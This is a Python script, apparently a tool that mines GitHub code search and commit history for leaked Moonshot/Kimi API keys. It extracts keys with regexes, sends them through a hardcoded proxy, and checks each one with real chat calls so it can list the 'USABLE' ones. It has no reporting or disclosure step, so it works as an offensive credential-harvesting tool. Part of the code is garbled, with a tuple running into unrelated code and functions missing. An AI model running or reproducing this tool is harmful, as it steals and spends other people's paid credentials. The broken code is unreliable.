#!/usr/bin/env python3 """Kimi (Moonshot AI) deep-miner v2. Over the verify-only hunt_kimi.py: - GitHub code search with a broad query set (env vars, api.moonshot.cn in many languages/configs, kimi model strings, base_url/openai-compat, docker/k8s/CI). - HEAD raw extraction + optional bounded per-file commit-history scan. - Incremental candidate/key checkpoints. Moonshot keys: sk- (documented form). We also accept the 32-hex form only when it appears in a Kimi/Moonshot context (the fetch step already scopes candidate files to such contexts), to avoid OpenAI false positives. Verify: GET /v1/users/me/balance -> chat moonshot-v1-8k -> kimi-k2. Only HTTP 401 => DEAD. Outputs results/kimi_v2/. """ import argparse, json, os, re, subprocess, sys, time import urllib.request, urllib.error, urllib.parse from concurrent.futures import ThreadPoolExecutor, as_completed from pathlib import Path sys.path.insert(0, str(Path(__file__).resolve().parent)) from verify_cache import CachedVerifier from content_cache import ContentCache, parse_raw_url HERE=Path(__file__).parent RESULTS=HERE/"results"/"kimi_v2"; RESULTS.mkdir(parents=True,exist_ok=True) EXTRACTED=RESULTS/"extracted_keys.txt"; CANDIDATES=RESULTS/"candidates.txt" GLOBAL=HERE/"results"/"extracted_keys.txt" UA="curl/8.5.0"; BASE="https://api.moonshot.cn" GH_PROXY=os.environ.get("GH_PROXY","http://114.111.19.228:3389") _gh=None def gh_opener(): global _gh if _gh is None: _gh=urllib.request.build_opener(urllib.request.ProxyHandler({"http":GH_PROXY,"https":GH_PROXY})) if GH_PROXY else urllib.request.build_opener() return _gh _di=None def direct(): global _di if _di is None: _di=urllib.request.build_opener(urllib.request.ProxyHandler({})) return _di # Moonshot documented key: sk- + 48 mixed-case alnum. Widen slightly 40-60. LONG_RE=re.compile(r"sk-[A-Za-z0-9]{40,60}") HEX_RE=re.compile(r"sk-[a-f0-9]{32}") FAKES=("xxxx","your-","example","placeholder","test-key","sk-00000000","t3blbkfj","RANK[best]: return v,d return best,detail def verify(key): # NOTE: Moonshot's /balance LIES. Accounts with suspended/arrears still # report positive balance, so we NEVER trust it alone - a real chat 200 # is the only USABLE signal. We use balance only as a weak hint. best,detail="DEAD","" code,body=http("GET","/v1/users/me/balance",key) bal_hint="" if code==200: try: d=json.loads(body); inner=d.get("data",d) val=0.0 for fld in ("available_balance","balance","cash_balance","voucher_balance"): try: val=max(val,float(inner.get(fld,0) or 0)) except (TypeError,ValueError): pass if val>0: bal_hint=f"bal=CNY{val:.2f} " except Exception: pass best,detail="NO_BALANCE",f"{bal_hint}balance OK (unverified)" elif code in (402,429): best,detail="NO_BALANCE",f"bal HTTP {code}: {body[:120]}" elif code==0: best,detail="UNKNOWN",body[:160] elif code!=401: best,detail="NO_ACCESS",f"bal HTTP {code}: {body[:120]}" # ALWAYS run a real chat - this is the source of truth. for model in ("moonshot-v1-8k","kimi-k2-0905-preview"): code,body=http("POST","/v1/chat/completions",key,body={ "model":model,"max_tokens":8,"messages":[{"role":"user","content":"reply OK"}]}) bl=(body or "").lower() if code==200 and '"choices"' in bl: try: txt=json.loads(body)["choices"][0]["message"].get("content","") return "USABLE",f"chat OK ({model}) {bal_hint}reply={txt[:30]!r}" except Exception: return "USABLE",f"chat 200 OK ({model}) {bal_hint}" if any(x in bl for x in ("suspended","insufficient_balance","insufficient balance", "exceeded_current_quota","arrearage","recharge", "account is suspended")): best,detail="NO_BALANCE",f"[{model}] suspended/arrears: {body[:140]}" elif code in (402,429) or any(x in bl for x in ("balance","quota")): v,d="NO_BALANCE",f"[{model}] HTTP {code}: {body[:140]}" if RANK[v]>RANK[best]: best,detail=v,d elif code==401: return "DEAD",f"chat 401 ({model})" elif code==0: if RANK["UNKNOWN"]>RANK[best]: best,detail="UNKNOWN",body[:160] else: v,d="NO_ACCESS",f"[{model}] HTTP {code}: {body[:120]}" if RANK[v]>RANK[best]: best,detail=v,d return best,detail def main(): ap=argparse.ArgumentParser() ap.add_argument("--verify-only",action="store_true") ap.add_argument("--workers",type=int,default=20) ap.add_argument("--commit-workers",type=int,default=10) ap.add_argument("--max-commits",type=int,default=3, help="per-file commit history depth (0 disables Stage 2c)") ap.add_argument("--resume",action="store_true") ap.add_argument("--limit",type=int,default=0) ap.add_argument("--no-cache",action="store_true",help="ignore verification cache") ap.add_argument("--no-content-cache",action="store_true", help="ignore raw file content cache (always re-crawl)") args=ap.parse_args() keys={} # seed from global pool if GLOBAL.exists(): for line in GLOBAL.read_text().splitlines(): if not line.startswith("Moonshot|"): continue p=line.split("|",3) if len(p)>=3: keys.setdefault(p[1],p[2]) # seed from prior kimi v1 extracted v1=HERE/"results"/"kimi"/"extracted_keys.txt" if v1.exists(): for line in v1.read_text().splitlines(): p=line.split("|",1) if p: keys.setdefault(p[0],p[1] if len(p)>1 else "v1") print(f"seeded {len(keys)} known Kimi keys") candidates={} if args.resume and CANDIDATES.exists(): for line in CANDIDATES.read_text().splitlines(): if "|" in line: u,r=line.split("|",1); candidates[u]=r print(f"resumed {len(candidates)} candidates") if not args.verify_only: token=github_token(); print(f"GitHub token: {'yes' if token else 'NO'}\n") print("=== Stage 1: search ===") for i,q in enumerate(SEARCH_QUERIES,1): print(f" [{i:3d}/{len(SEARCH_QUERIES)}] {q}") try: for it in gh_search(q,token): u=it.get("html_url","") if u and u not in candidates: candidates[u]=it.get("repository",{}).get("full_name","?") except Exception as e: print(f" err {e}",file=sys.stderr) if i%10==0: CANDIDATES.write_text("\n".join(f"{u}|{r}" for u,r in candidates.items())) CANDIDATES.write_text("\n".join(f"{u}|{r}" for u,r in candidates.items())) print(f" candidates: {len(candidates)}") print("\n=== Stage 2a: HEAD fetch & extract ===") done=new=0 with ContentCache(force=getattr(args,"no_content_cache",False)) as cc: cfetch = make_cached_fetch(cc) with ThreadPoolExecutor(max_workers=20) as pool: futs={pool.submit(cfetch,to_raw(u)):u for u in candidates} for fut in as_completed(futs): u=futs[fut]; done+=1 try: c=fut.result() except Exception: c="" new+=extract(c,keys,u) if done%200==0: print(f" {done}/{len(candidates)} keys={len(keys)} new={new} " f"cache={cc.hits}hit/{cc.misses}fetch") EXTRACTED.write_text("\n".join(f"{k}|{s}" for k,s in sorted(keys.items()))) st=cc.stats() print(f" content cache: {st['hits']} hits, {st['misses']} fetched " f"({st['bytes_served']} bytes served from cache)") print(f" after HEAD: {len(keys)} keys ({new} new)") if args.max_commits>0 and token: print(f"\n=== Stage 2c: commit history (depth {args.max_commits}) ===") repo_paths={} for u in candidates: repo,sha,path=split_html_url(u) if repo and path: repo_paths.setdefault(repo,set()).add(path) tasks=[(r,p) for r,paths in repo_paths.items() for p in paths] print(f" {len(tasks)} (repo,path) pairs, {len(repo_paths)} repos") done=0 with ContentCache(force=getattr(args,"no_content_cache",False)) as cc: cfetch = make_cached_fetch(cc) def job(rp): repo,path=rp; found=[] for sha in list_file_commits(repo,path,token,args.max_commits): txt=cfetch(f"https://raw.githubusercontent.com/{repo}/{sha}/{path}") for k in LONG_RE.findall(txt or ""): if "t3blbkfj" not in k.lower() and not any(f in k.lower() for f in FAKES): found.append((k,f"https://github.com/{repo}/blob/{sha}/{path}")) return found with ThreadPoolExecutor(max_workers=args.commit_workers) as pool: futs={pool.submit(job,t):t for t in tasks} for fut in as_completed(futs): done+=1 try: for k,src in fut.result(): if k not in keys: keys[k]=src; new+=1 except Exception: pass if done%200==0: print(f" {done}/{len(tasks)} keys={len(keys)} new={new} " f"cache={cc.hits}hit/{cc.misses}fetch") EXTRACTED.write_text("\n".join(f"{k}|{s}" for k,s in sorted(keys.items()))) st=cc.stats() print(f" commit content cache: {st['hits']} hits, {st['misses']} fetched") print(f" after commits: {len(keys)} keys") EXTRACTED.write_text("\n".join(f"{k}|{s}" for k,s in sorted(keys.items()))) if args.verify_only and EXTRACTED.exists(): keys={} for line in EXTRACTED.read_text().splitlines(): p=line.split("|",1) if p: keys[p[0]]=p[1] if len(p)>1 else "?" if args.limit>0: keys=dict(list(keys.items())[:args.limit]) print(f"\n=== Stage 3: verify {len(keys)} keys (workers={args.workers}) ===") B={"USABLE":[],"NO_BALANCE":[],"NO_ACCESS":[],"UNKNOWN":[],"DEAD":[]} done=0; st=time.time() with CachedVerifier("kimi", verify, force=args.no_cache) as ver: with ThreadPoolExecutor(max_workers=args.workers) as pool: futs={pool.submit(ver,k):(k,s) for k,s in keys.items()} for fut in as_completed(futs): k,s=futs[fut]; done+=1 try: v,d=fut.result() except Exception as e: v,d="UNKNOWN",f"exc {e}" B[v].append((k,s,d)) if done%100==0: el=time.time()-st print(f" [{done:5d}/{len(keys)}] use={len(B['USABLE'])} nobal={len(B['NO_BALANCE'])} noacc={len(B['NO_ACCESS'])} unk={len(B['UNKNOWN'])} dead={len(B['DEAD'])} ({done/el:.1f}/s)") print(f" cache: {ver.stats()['hits']} hits, {ver.stats()['live']} live queries") print(f"\nDone in {time.time()-st:.1f}s") for n in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN","DEAD"): p=RESULTS/f"{n.lower()}.txt" p.write_text("\n".join(f"{k}|{s}|{d}" for k,s,d in sorted(B[n]))) print(f" {n:11s}: {len(B[n]):5d} -> {p.name}") (RESULTS/"all_non_401.txt").write_text("\n".join( f"{n}|{k}|{s}|{d}" for n in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN") for k,s,d in sorted(B[n]))) if B["USABLE"]: print("\n=== USABLE ===") for k,s,d in sorted(B["USABLE"]): print(f" {k}\n {s}\n {d}") if __name__=="__main__": main()